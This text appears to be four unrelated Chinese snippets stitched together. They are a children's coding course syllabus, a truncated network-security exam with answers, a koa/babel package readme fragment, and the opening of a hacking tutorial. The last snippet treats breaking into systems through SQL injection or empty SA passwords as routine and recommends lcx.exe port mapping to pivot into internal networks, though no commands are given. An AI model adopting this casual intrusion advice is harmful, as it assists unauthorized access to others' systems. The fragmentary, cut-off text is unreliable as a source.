课次 剧情阶段 课程名称 知识点 用到的基本命令 第01课 危险来临 入侵危机 "1. 认识编程软件 2. 添加、删除角色 3. 控制角色的简单移动" 1.外观指令:角色切换 2.运动指令:角色移动 3.控制指令:重复移动 第02课 ...
计算机网络安全试题及答案 计算机网络安全试题及答案(1) 一、单项... ACD A、在对称加密中,只有一个密钥用来加密和解密信息 B、在对称加密中,用到了二个密钥来加密和解密信息,分别是公共密钥和私用密钥 C、对称
执行用到async的时候需要babel环境,这里稍微简单的封装了一下,以便于更简单的使用koa的时候,不用在意babel的细节 它是的核心组件 暂时不支持Windows 依赖 "babel-core": "^6.7.5", "babel-polyfill": "^6.1.4", ...
大家在入侵的时候不管用什么方法,得到了一个shell(多数是发生在SQL注入和SA空口令的情况下),可一看是个内网...却又舍不得扔,鸡肋啊.....这时候就要用到端口映射了,这方面的工具很多,个人认为还是lcx.exe比较好用...